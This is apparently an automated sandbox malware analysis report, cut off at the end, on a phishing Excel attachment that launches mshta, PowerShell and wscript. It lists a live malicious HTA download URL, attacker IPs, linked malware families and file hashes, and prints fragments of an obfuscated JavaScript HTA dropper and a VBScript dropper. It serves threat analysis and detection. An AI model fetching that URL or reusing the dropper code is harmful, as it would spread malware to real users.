                                                    http://172.245.123.12/361/sen/seemebestgoodluckthings.htaemshta.exe, 00000004.00000003.485827877.00000000037D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.485266356.00000000037D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      142.215.209.77
                                                      		ip.1016.filemail.comCanada
                                                      		32156HUMBER-COLLEGECAtrue
                                                      188.114.97.6
                                                      		linkjago.meEuropean Union
                                                      		13335CLOUDFLARENETUSfalse
                                                      172.245.123.12
                                                      		unknownUnited States
                                                      		36352AS-COLOCROSSINGUStrue

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1566416
                                                      Start date and time:2024-12-02 07:27:02 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 6m 23s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                      Number of analysed new started processes analysed:18
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • GSI enabled (VBA)
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:PI-02911202409#.xla.xlsx
                                                      Detection:MAL
                                                      Classification:mal100.phis.troj.expl.evad.winXLSX@16/25@7/3
                                                      EGA Information:
                                                      • Successful, ratio: 66.7%
                                                      HCA Information:
                                                      • Successful, ratio: 99%
                                                      • Number of executed functions: 19
                                                      • Number of non-executed functions: 52
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .xlsx
                                                      • Changed system and user locale, location and keyboard layout to French - France
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Active ActiveX Object
                                                      • Active ActiveX Object
                                                      • Scroll down
                                                      • Close Viewer

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                                      • Execution Graph export aborted for target mshta.exe, PID 3600 because there are no executed function
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      01:28:51API Interceptor84x Sleep call for process: mshta.exe modified
                                                      01:28:57API Interceptor118x Sleep call for process: powershell.exe modified
                                                      01:29:06API Interceptor5x Sleep call for process: wscript.exe modified
                                                      01:29:27API Interceptor3x Sleep call for process: aspnet_compiler.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      142.215.209.77PO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                        Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                          Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                            188.114.97.6ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                            • orbitdownloader.com/
                                                            ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                            • orbitdownloader.com/
                                                            INVOICE087667899.exeGet hashmaliciousUnknownBrowse
                                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                                            ZciowjM9hN.exeGet hashmaliciousLokibotBrowse
                                                            • vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            ip.1016.filemail.comPO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                            • 142.215.209.77
                                                            Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                            • 142.215.209.77
                                                            0028BGL880-2024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            • 192.240.97.18
                                                            linkjago.mePO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                            • 188.114.96.6

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUSPO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                            • 188.114.97.6
                                                            http://demo.specialistbanking.co.uk/ad.PDFGet hashmaliciousUnknownBrowse
                                                            • 104.16.123.96
                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 172.67.145.234
                                                            file.exeGet hashmaliciousAmadey, Discord Token Stealer, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                            • 172.67.165.166
                                                            sora.mips.elfGet hashmaliciousMiraiBrowse
                                                            • 1.4.51.14
                                                            sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                            • 172.68.102.131
                                                            file.exeGet hashmaliciousLummaCBrowse
                                                            • 104.21.82.174
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 172.67.165.166
                                                            https://wixauth-processing.es/wp/vite-react-web.vercel.app.htmlGet hashmaliciousUnknownBrowse
                                                            • 104.21.26.223
                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                            • 104.21.16.9
                                                            AS-COLOCROSSINGUSla.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                            • 107.175.186.126
                                                            m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 107.174.8.80
                                                            bot.x86_64.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 107.175.32.137
                                                            sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                            • 192.210.142.167
                                                            bot.arm6.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 107.175.32.137
                                                            bot.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 107.175.32.137
                                                            bot.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 107.175.32.137
                                                            bot.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 107.175.32.137
                                                            bot.ppc.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 107.175.32.137
                                                            bot.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 107.175.32.137
                                                            HUMBER-COLLEGECAPO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                            • 142.215.209.77
                                                            Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                            • 142.215.209.77
                                                            https://www.filemail.com/d/dolcahmytquddazGet hashmaliciousUnknownBrowse
                                                            • 142.215.209.74
                                                            la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                            • 142.214.116.218
                                                            geHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                            • 142.215.209.78
                                                            QUOTATION.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.78
                                                            Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.78
                                                            segura.vbsGet hashmaliciousRemcosBrowse
                                                            • 142.215.209.78
                                                            asegurar.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                            • 142.215.209.78

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            05af1f5ca1b87cc9cc9b25185115607dPO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                            • 142.215.209.77
                                                            Swift copy.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            RFQ-ROJECT FTL 010-271124.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            Swiftcopy.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            Pedido No 4500924462.xlsGet hashmaliciousUnknownBrowse
                                                            • 142.215.209.77
                                                            26-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 142.215.209.77
                                                            Document.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 142.215.209.77
                                                            7dcce5b76c8b17472d024758970a406bPO#BBGR2411PO69.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                            • 188.114.97.6
                                                            SwiftCopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                            • 188.114.97.6
                                                            SwiftCopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                            • 188.114.97.6
                                                            Swift copy.xlsGet hashmaliciousHTMLPhisherBrowse
                                                            • 188.114.97.6
                                                            RFQ-ROJECT FTL 010-271124.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                            • 188.114.97.6
                                                            Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                            • 188.114.97.6
                                                            Swiftcopy.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                            • 188.114.97.6
                                                            Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                            • 188.114.97.6
                                                            Order Summary.xlsGet hashmaliciousUnknownBrowse
                                                            • 188.114.97.6
                                                            container payment.xlsGet hashmaliciousUnknownBrowse
                                                            • 188.114.97.6

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):15189
                                                            Entropy (8bit):5.0343247648743
                                                            Encrypted:false
                                                            SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                            MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                            SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                            SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                            SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                            Malicious:false
                                                            Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):0.34726597513537405
                                                            Encrypted:false
                                                            SSDEEP:3:Nlll:Nll
                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                            Malicious:false
                                                            Preview:@...e...........................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestgoodluckthings[1].hta

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                            Category:modified
                                                            Size (bytes):159541
                                                            Entropy (8bit):2.4836204478867345
                                                            Encrypted:false
                                                            SSDEEP:96:4owZw9d6yfazVouAC/sI5UE+aoOun2sGo1mgFVouAC/sI5UE+ao4zun2sGo1mgvT:4LwVgWZGALwYCSQ
                                                            MD5:46792B4C6325DFCC5943FB8912B50BCD
                                                            SHA1:B20380592EE042E7D232D4946E63CB5559CB0EDA
                                                            SHA-256:18A4B2FDA9E31862CE0AF8003ED1D5AB843D99F25E9E4FD5FB9F328C5CF0D5E6
                                                            SHA-512:005BB4CBCC9C2DEB6B0E13E2273F78860DA429B76510853E7CBA59EAF3AFA8F553D32D719FEA167EDAD00BF4694F06A1BC50697719D9952FFA0557292F673199
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestgoodluckthings[1].hta, Author: Joe Security
                                                            Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253CScript%2520Language%253D%2527Javascript%2527%253E%250A%253C%2521--%2520HTML%2520Encryption%2520provided%2520by%2520tufat.com%2520--%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2527%25253C%252521%252544%25254F%252543%252554%252559%252550%252545%252520%252568%252574%25256D%25256C%25253E%25250A%25253C%25256D%252565%252574%252561%252520%252568%252574%252574%252570%25252D%252565%252571%252575%252569%252576%25253D%252522%252558%25252D%252555%252541%25252D%252543%25256F%25256D%252570%252561%252574%252569%252562%25256C%252565%252522%252520%252563%25256F%25256E%252574%252565%25256E%252574%25253D%252522%252549%252545%25253D%252545%25256D%252575%25256C%252561%252574%252565%252549%252545%252538%252522%252520%25253E%25250A%25253C%252568%252574%25256D%25256C%25253E%25250A%25253C%252562%25256F%252564%252579%25253E%25250A%25253C%252573%252543%252572%252549%252550%252574%252520%25254C%252561%25256E%252547%2525

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seemebestthingsentirelifegivenbackwithgood[1].tiff

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (3250), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):153980
                                                            Entropy (8bit):3.8161579842669506
                                                            Encrypted:false
                                                            SSDEEP:3072:MlZ1afy+UshLTPok1alZ1afy+UshLTPokLlZ1afy+UshLTPoks:C+fKsJPBU+fKsJPt+fKsJPI
                                                            MD5:2A35C64DA74E31C6BB2233098EBCAD33
                                                            SHA1:AB084CC1659686A49EB65334623F4845E8FDB9F6
                                                            SHA-256:3C1E1203375F84E0DC74AADD09507C7A0F3ECD5626E6F7D5A917F18246C8F2B9
                                                            SHA-512:399989AD6245A605DD5D435D33A8BFCDCF55B6EB2C159D2944A1168026E555F9A924DC04D2D2E0E6844EF40D212B2A89EA2D30350054B3F4C60A43695B610E35
                                                            Malicious:false
                                                            Preview:...... . . . .....d.W.I.L.W.L.o.W.R.u.A.L.C.x.B. .=. .".z.l.m.k.f.b.W.m.g.u.p.W.h.N.G.".....r.o.T.i.k.l.Z.d.L.W.B.t.G.K.Q. .=. .".a.L.l.e.a.K.k.K.H.c.L.Z.c.c.L.".....f.P.p.x.j.a.N.q.R.H.K.O.t.C.c. .=. .".C.m.g.W.f.P.k.W.R.t.x.g.q.i.s.".........o.c.i.L.N.U.G.z.e.g.K.h.J.P.L. .=. .".G.k.H.h.l.B.K.r.I.c.a.i.b.W.f.".....u.W.i.W.S.L.f.n.l.k.a.i.Z.N.O. .=. .".o.b.I.b.K.J.L.o.L.o.i.N.W.o.i.".....L.B.o.W.f.K.m.W.P.h.c.T.i.c.f. .=. .".G.h.L.K.U.i.u.L.b.n.d.v.a.k.U.".....d.A.i.A.R.R.N.L.Q.L.k.A.m.q.W. .=. .".v.z.b.e.p.U.I.v.c.A.C.b.W.L.t.".....N.a.c.l.R.N.f.u.H.G.x.d.k.U.T. .=. .".j.q.W.G.A.G.L.r.z.l.c.a.j.P.b.".....R.b.d.j.K.c.p.L.z.u.f.q.I.a.U. .=. .".h.P.U.O.e.P.L.h.o.P.h.U.h.n.K.".....T.e.K.a.N.W.S.e.a.d.f.L.q.N.i. .=. .".n.e.v.B.d.m.x.W.O.h.P.L.U.B.B.".....x.m.W.P.A.u.P.f.z.a.a.j.s.U.i. .=. .".p.A.Z.W.h.o.C.L.L.C.L.b.e.I.W.".....K.v.U.C.l.f.e.H.Z.O.s.W.i.n.L. .=. .".z.U.B.o.S.L.G.i.G.k.l.W.i.k.K.".....f.x.l.z.x.L.k.W.G.R.G.W.p.k.C. .=. .".K.c.K.l.u.n.W.W.L.I.G.l.q.Q.B.".....l.x.I.H.o.Z.m.a.

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D1157F7.emf

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                            Category:dropped
                                                            Size (bytes):44256
                                                            Entropy (8bit):3.15066292565687
                                                            Encrypted:false
                                                            SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
                                                            MD5:F1EC2E98B0F577B675156B13DCF94105
                                                            SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
                                                            SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
                                                            SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
                                                            Malicious:false
                                                            Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4694F341.emf

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                            Category:dropped
                                                            Size (bytes):44256
                                                            Entropy (8bit):3.147465798679962
                                                            Encrypted:false
                                                            SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
                                                            MD5:36D8FF25D14E7E2FBB1968E952FF9C17
                                                            SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
                                                            SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
                                                            SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
                                                            Malicious:false
                                                            Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AFD5404E.emf

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                            Category:dropped
                                                            Size (bytes):109544
                                                            Entropy (8bit):4.282675970330063
                                                            Encrypted:false
                                                            SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
                                                            MD5:F7B9A8F20E64B2CB6B572BCBA5866236
                                                            SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
                                                            SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
                                                            SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
                                                            Malicious:false
                                                            Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC3D3040.emf

                                                            Download File
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                            Category:dropped
                                                            Size (bytes):1293620
                                                            Entropy (8bit):4.563127917199792
                                                            Encrypted:false
                                                            SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                                                            MD5:F71C973B5E362DFD6408D6C009E5643E
                                                            SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                                                            SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                                                            SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                                                            Malicious:false
                                                            Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                            C:\Users\user\AppData\Local\Temp\35g0sohe.lji.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:U:U
                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                            Malicious:false
                                                            Preview:1

                                                            C:\Users\user\AppData\Local\Temp\RES2DE4.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Dec 2 06:29:00 2024, 1st section name ".debug$S"
                                                            Category:dropped
                                                            Size (bytes):1328
                                                            Entropy (8bit):3.9575059461541477
                                                            Encrypted:false
                                                            SSDEEP:24:H7e9ERj5cWjdHWwKdNWI+ycuZhNoakSkPNnqSqd:15cWxVKd41uloa3kqSK
                                                            MD5:4DC1AFA0014F00076141C340C35B8CC7
                                                            SHA1:4C2783551B24558B06D1674732FA94B221C3ACA5
                                                            SHA-256:0528EC35EAE03648FF032B75D771A1E85B3CAFA7E77B39A6FE510E24DCF31E81
                                                            SHA-512:32BE07217DDB3E3EFF0DF7DE54E5A4E7BB661C8F9DC9706A0F8C6A4187413F28F4353EE04F620443CA1CE39C44F931C040E5283857CF70EB3ABB68CE2477E7C1
                                                            Malicious:false
                                                            Preview:L....SMg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\akgiliwf\CSC107B8B87724F4FE1A74D28EF2C06A4.TMP...................*.... 1...d2...........4.......C:\Users\user\AppData\Local\Temp\RES2DE4.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.k.g.i.l.i.w.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                            C:\Users\user\AppData\Local\Temp\akgiliwf\CSC107B8B87724F4FE1A74D28EF2C06A4.TMP

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:MSVC .res
                                                            Category:dropped
                                                            Size (bytes):652
                                                            Entropy (8bit):3.0845695015958294
                                                            Encrypted:false
                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryxYxak7YnqqgY2PN5Dlq5J:+RI+ycuZhNoakSkPNnqX
                                                            MD5:D8B8162ACE041094203109AC0C64322E
                                                            SHA1:39FAA0690BF215230669D711D844036F280031D0
                                                            SHA-256:B27829800CD4AEE8EE9B0B22835DA3E45521EBC26764CF57B7E5DCE2710C8424
                                                            SHA-512:1C5E58E59C483C85AC629D172BB9F4FA7C9BA586B374B59A071103B46639C7DC700D16F13B29AEB6495E59B574CAB426F5DC07BBBA83870C55B9BA0B2BC607B4
                                                            Malicious:false
                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.k.g.i.l.i.w.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.k.g.i.l.i.w.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                            C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.0.cs

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (355)
                                                            Category:dropped
                                                            Size (bytes):470
                                                            Entropy (8bit):3.8071536434612825
                                                            Encrypted:false
                                                            SSDEEP:6:V/DsYLDS81zuueUe7mMGlfp7QXReKJ8SRHy4Hsf8Xr0J4ubqQmprMIy:V/DTLDfuRmWXfHIu864Iy
                                                            MD5:2506B88F783423EB6A12FAD18A28E4C6
                                                            SHA1:E4B2A9418A3B7D3D3D6F3608F3B094C6CF96A558
                                                            SHA-256:A61DD03E8FD6D96D0F1F793314D5EA799BFA053BA3256C72AC56E75BF8B7228C
